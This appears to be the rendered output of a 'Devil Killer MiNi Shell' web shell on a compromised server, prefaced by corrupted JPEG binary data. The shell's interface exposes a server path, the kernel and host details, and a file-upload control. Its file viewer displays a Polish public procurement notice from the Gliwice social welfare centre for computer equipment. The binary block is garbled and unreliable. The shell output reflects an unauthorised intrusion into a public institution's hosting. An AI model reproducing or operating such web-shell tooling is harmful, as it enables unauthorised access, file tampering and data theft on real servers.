JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250708/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250708/0031355401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> 2025- Zakup sprzętu komputerowego wraz z oprogramowaniem oraz urządzeń drukujących </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ W GLIWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003451973</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Górnych Wałów 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/32 335 96 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 230 80 27</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ops@ops.gliwice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opsgliwice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 2025- Zakup sprzętu komputerowego wraz z oprogramowaniem oraz urządzeń drukujących </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9cbadbbe-0d11-407c-99d6-718459d5a705</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00313554</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037862/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup sprzętu komputerowego wraz z oprogramowaniem oraz urządzeń drukujących</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> CZĘŚĆ PIERWSZA POSTĘPOWANIA realizowana jest dla Projektu „Rodzinna przystań” realizowanego w ramach Programu Fundusze Europejskie dla Śląskiego 2021-2027 współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9cbadbbe-0d11-407c-99d6-718459d5a705 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) w postępowaniu o udzielenie zamówienia publicznego<br/> komunikacja miedzy Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod<br/> adresem https://ezamowienia.gov.pl<br/> 2) Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: ops@ops.gliwice.eu (nie dotyczy<br/> składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca zamierzający wziąć<br/> udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat<br/> zakładania kont podmiotów oraz zasady i warunki<br/> korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/> https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”,<br/> 2) przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/> ani logowania,<br/> 3) sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/> zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami<br/> określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych,<br/> 4) dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/> sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/> dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/> konkursie, wskazane w rozdziale &#34;Dokumenty lub oświadczenia, składane w toku<br/> postępowania o zamówienie publiczne&#34; oraz &#34;Opis sposobu przygotowania i składania oferty&#34; niniejszej specyfikacji, sporządza się w<br/> postaci elektronicznej, w formatach danych określonych w przepisach<br/> rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (KIR), z uwzględnieniem rodzaju przekazywanych<br/> danych i przekazuje się jako załączniki. Ponadto, do kompresji (zmniejszenia objętości) dokumentów elektronicznych Zamawiający<br/> dopuszcza również<br/> możliwość przekazywania dokumentów w formacie &#34;.rar&#34;, natomiast do danych zawierających informacje graficzną - format &#34;.bmp&#34;.<br/> Preferowane przez Zamawiającego formaty:<br/> a) danych: .pdf, .doc, .docx, .rtf, .odt, .ods, .xls, .xlsx, .jpg (.jpeg);<br/> b) kompresji dokumentów elektronicznych: .zip, .7z.<br/> W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania,<br/> 5) informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Radym Ministrów z dnia 30<br/> grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/> elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie,<br/> przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/> a) w formatach danych określonych w pkt 4) i przekazuje się jako załącznik, lub<br/> b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, np. w treści<br/> wiadomości e-mail (nie dotyczy składania ofert) lub w treści &#34;Formularza do komunikacji&#34;,<br/> 6) jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/> tajemnice przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r.<br/> o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w<br/> poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz<br/> z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnice przedsiębiorstwa” – dotyczy zarówno etapu<br/> składania ofert oraz dokumentów/oświadczeń składanych w toku postępowania o zamówienie<br/> publiczne.<br/> Szczegółowe informacje zawarte są w rozdziale 12. SWZ &#34;Informacje o środkach komunikacji elektronicznej&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja w rozdziale 27. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS-ZP.321.22.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa dla Projektu „Rodzinna przystań” realizowanego w ramach Programu Fundusze Europejskie dla Śląskiego 2021-2027 współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus<br/><br/>1. Laptop 8 SZTUK o parametrach:<br/> O przekątnej ekranu min 15,6&#34;, typ ekranu matowy (LED),- procesor, min. 13000 pkt (wynik zaproponowanego procesora musi znajdować się na stronie<br/> http://www.cpubenchmark.net). Na dzień 05.06.2025- pamięć: min. RAM DDR4 16 GB, - dysk SSD M.2 min. 450 GB, - rozdzielczość ekranu 1920 x 1080, - wbudowane wejście LAN 10/100/1000 Mbps, - wbudowany moduł Wi-Fi 802.11 n/ac, moduł Bluetooth, - rodzaje wejść (wbudowane): min. USB 3.1 – 1 szt., USB 3.2 - 1 szt., HDMI - 1 szt., wyjście słuchawkowe/wejście mikrofonowe, - bateria Li-Ion, min.3400 mAh- wielodotykowy touchpad,- zintegrowana kamera<br/>- zasilacz, - klawiatura QWERTY PL- wydzielona klawiatura numeryczna- możliwość zabezpieczenia linką- gwarancja producenta min. 12 miesięcy- zainstalowany system operacyjny System operacyjny Microsoft Windows 11 Pro PL 64-bit <br/>Język Polska wersja językowa (PL)<br/> Architektura 64-bitowa<br/> Typ licencji Licencja wieczysta, elektroniczna lub OEM/FPP<br/> Możliwość aktywacji Online i telefonicznie<br/> Obsługiwane procesory 64-bitowe procesory z min. 1 GHz, 2 rdzenie, zgodne z listą obsługiwanych CPU<br/> Windows 11<br/> Pamięć RAM Min. 4 GB<br/> Karta graficzna Zgodna z DirectX 12 / WDDM 2.0<br/> TPM Wersja 2.0<br/> Interfejs użytkownika Graficzny, z obsługą dotyku, myszy i klawiatury<br/> Tryby pracy Obsługa trybu pulpitu zdalnego, wirtualizacji, domeny AD, BitLocker, Hyper-V<br/> Aktualizacje Automatyczne aktualizacje bezpieczeństwa i funkcji<br/> Zgodność Pełna kompatybilność z urządzeniami i oprogramowaniem dla Windows 11 Pro<br/> Wsparcie Aktualizacje i wsparcie techniczne producenta<br/> Funkcje wymagane:<br/> Obsługa szyfrowania BitLocker<br/> Możliwość przyłączenia do domeny Active Directory i Azure AD<br/> Obsługa Hyper-V (wirtualizacja)<br/> Zdalny pulpit (Remote Desktop)<br/> Windows Update for Business<br/> Możliwość zarządzania przez Group Policy<br/> Obsługa konta lokalnego i Microsoft Account<br/> Wymagania dodatkowe:<br/> Oprogramowanie musi pochodzić z legalnego źródła (dystrybutor autoryzowany przez Microsoft), licencja musi<br/> umożliwiać legalne użytkowanie w administracji publicznej lub firmie, dostarczona licencja nie może pochodzić<br/> z programów edukacyjnych, MSDN, triali ani innych wersji ograniczonych. Dopuszcza się system operacyjny równoważny, pod warunkiem zapewnienia identycznej lub wyższej funkcjonalności oraz pełnej kompatybilności<br/> z oprogramowaniem działającym na Windows 11 Pro. W przypadku zaoferowania systemu równoważnego Wykonawca zobowiązany jest do dostarczenia jego dokumentacji technicznej potwierdzającej zgodność.<br/> 2. Torba na laptopa 8 SZTUK o parametrach:<br/> Rozmiar: 15,6 cala; pasek na ramię; kieszeń na laptopa + dodatkowo 2 x kieszeń (dokumenty, akcesoria),<br/> materiał: nylon lub poliester, kolor dominujący czarny)<br/> 3. Mysz bezprzewodowa (wireless) 8 SZTUK o parametrach:<br/> Technologia połączenia 2.4 GHz (USB nano odbiornik)<br/> Zasięg działania min. 10 metrów<br/> Rodzaj sensora Optyczny<br/> Rozdzielczość sensora min. 1000 DPI<br/> Liczba przycisków Min. 3<br/> Kółko przewijania z funkcją przycisku środkowego<br/> Zasilanie 1x bateria AA lub AAA<br/> Kompatybilność Windows 11, Linux, macOS<br/> Ergonomia Obudowa profilowana do pracy prawą ręką lub uniwersalna<br/> Wymiary Maks. 110 x 65 x 40 mm<br/> Waga Maks. 90 g z baterią<br/> Kolor Czarny, szary lub grafitowy (nie jaskrawy)<br/> Funkcje dodatkowe:<br/> • Funkcja oszczędzania energii (auto sleep mode)<br/> • Plug &amp; Play – brak konieczności instalacji sterowników<br/> • Możliwość przechowywania odbiornika USB w obudowie myszy<br/> Wymagania jakościowe i formalne:<br/> • Produkt fabrycznie nowy<br/>Gwarancja producenta min. 12 miesięcy<br/> • Oznaczenie CE<br/> • Instrukcja w języku polskim (papierowa lub elektroniczna)<br/> • Zgodność z RoHS<br/> 4. Licencja na pakiet biurowy MS OFFICE 2024 PL BOX 8 SZTUK o parametrach:<br/> brak ograniczeń czasowych okresu użytkowania (lub równoważny: zapewniający pełną możliwość odczytu<br/> i edycji dokumentów utworzonych w aplikacjach wchodzących w skład pakietu MS Office 2003 bez utraty<br/> jakichkolwiek parametrów tych dokumentów współpracujący z oprogramowaniem używanym przez<br/> Zamawiającego m.in. szablonami opartymi na języku makropoleceń, systemem obiegu dokumentów).<br/> Pakiet powinien zawierać co najmniej: edytor tekstu, arkusz kalkulacyjny, program do tworzenia prezentacji,<br/> program do obsługi poczty elektronicznej, charakteryzujący się następującymi cechami: <br/>• pełna polska wersja językowa interfejsu użytkownika, dokumentacja oraz pomoc techniczna w języku<br/> polskim,<br/> • możliwość blokowania niebezpiecznej lub niechcianej poczty,<br/> • prawidłowe odczytywanie i zapisywanie danych w dokumentach w formatach: DOC, .DOCX, XLS, .XLSX,<br/> w tym obsługa formatowania, makr, formuł, formularzy w plikach wytworzonych w MS Office 2007, MS Office<br/> 2010<br/> • zaproponowane oprogramowanie musi posiadać taki sposób licencjonowania, który zapewni jego instalację<br/> na komputerze (komputerach) innych niż te, na których pierwotnie zainstalowano oprogramowanie,<br/> pod warunkiem wcześniejszej deinstalacji z tego komputera (komputerów).<br/> • możliwość instalacji na systemach operacyjnych Microsoft Windows: 10,11<br/> zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Excel,<br/> Word, Power Point w wersji 2003 oraz 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich<br/> funkcji specjalnych i makropoleceń.<br/> • zamawiane oprogramowanie musi być wersją wydaną w 2024 roku, zapewniającą pełne wsparcie techniczne<br/> na kolejne lata </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30237270-2 - Torby na komputery przenośne</p> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Drukarka laserowa A4 2 SZTUKI o parametrach:<br/> Typ druku Laserowy, monochromatyczny<br/> Format papieru A4<br/> Prędkość druku min. 20 str./min<br/> Rozdzielczość druku min. 600 x 600 dpi<br/> Podajnik papieru min. 150 arkuszy<br/> Łączność USB 2.0, WiFi 802.11b/g/n<br/> Obsługa urządzeń mobilnych AirPrint, <br/>Pamięć min. 32 MB RAM<br/> Obsługa systemów operacyjnych Windows 10/11, macOS, Linux<br/> Zużycie energii Tryb gotowości: max. 2W, drukowanie: max. 300W<br/> Wymiary max. 350 x 300 x 200 mm<br/> Waga max. 4 kg<br/> Głośność pracy max. 51 dB(A)<br/> Gwarancja producenta min. 12 miesięcy<br/> Dołączone akcesoria: kabel zasilający, kabel USB, toner startowy.<br/> 2. Laptop 2 SZTUKI o parametrach:<br/> O przekątnej ekranu min 15,6&#34;, typ ekranu matowy (LED),- procesor, min. 13000 pkt (wynik zaproponowanego procesora musi znajdować się na stronie<br/> http://www.cpubenchmark.net). Na dzień 05.06.2025- pamięć: min. RAM DDR4 16 GB, - dysk SSD M.2 min. 450 GB, - rozdzielczość ekranu 1920 x 1080, - wbudowane wejście LAN 10/100/1000 Mbps, - wbudowany moduł Wi-Fi 802.11 n/ac, moduł Bluetooth, - rodzaje wejść (wbudowane): min. USB 3.1 – 1 szt., USB 3.2 - 1 szt., HDMI - 1 szt., wyjście<br/> słuchawkowe/wejście mikrofonowe, - bateria Li-Ion, min.3400 mAh- wielodotykowy touchpad,- zintegrowana kamera, - zasilacz, - klawiatura QWERTY PL- wydzielona klawiatura numeryczna- możliwość zabezpieczenia linką- gwarancja producenta min. 12 miesięcy- zainstalowany system operacyjny System operacyjny Microsoft Windows 11 Pro PL 64-bit <br/>Język Polska wersja językowa (PL)<br/> Architektura 64-bitowa<br/> Typ licencji Licencja wieczysta, elektroniczna lub OEM/FPP<br/> Możliwość aktywacji Online i telefonicznie<br/> Obsługiwane procesory 64-bitowe procesory z min. 1 GHz, 2 rdzenie, zgodne z listą obsługiwanych CPU<br/> Windows 11<br/> Pamięć RAM Min. 4 GB<br/> Karta graficzna Zgodna z DirectX 12 / WDDM 2.0<br/> TPM Wersja 2.0<br/> Interfejs użytkownika Graficzny, z obsługą dotyku, myszy i klawiatury<br/> Tryby pracy Obsługa trybu pulpitu zdalnego, wirtualizacji, domeny AD, BitLocker, Hyper-V<br/> Aktualizacje Automatyczne aktualizacje bezpieczeństwa i funkcji<br/> Zgodność Pełna kompatybilność z urządzeniami i oprogramowaniem dla Windows 11 Pro<br/> Wsparcie Aktualizacje i wsparcie techniczne producenta<br/> Funkcje wymagane:<br/> Obsługa szyfrowania BitLocker<br/> Możliwość przyłączenia do domeny Active Directory i Azure AD<br/> Obsługa Hyper-V (wirtualizacja)<br/> Zdalny pulpit (Remote Desktop)<br/> Windows Update for Business<br/> Możliwość zarządzania przez Group Policy<br/> Obsługa konta lokalnego i Microsoft Account<br/> Wymagania dodatkowe:<br/> Oprogramowanie musi pochodzić z legalnego źródła (dystrybutor autoryzowany przez Microsoft), licencja musi<br/> umożliwiać legalne użytkowanie w administracji publicznej lub firmie, dostarczona licencja nie może pochodzić<br/> z programów edukacyjnych, MSDN, triali ani innych wersji ograniczonych. Dopuszcza się system operacyjny<br/> równoważny, pod warunkiem zapewnienia identycznej lub wyższej funkcjonalności oraz pełnej kompatybilności<br/> z oprogramowaniem działającym na Windows 11 Pro. W przypadku zaoferowania systemu równoważnego<br/> Wykonawca zobowiązany jest do dostarczenia jego dokumentacji technicznej potwierdzającej zgodność.<br/> 3. Mysz bezprzewodowa (wireless) 2 SZTUKI o parametrach:<br/> Technologia połączenia 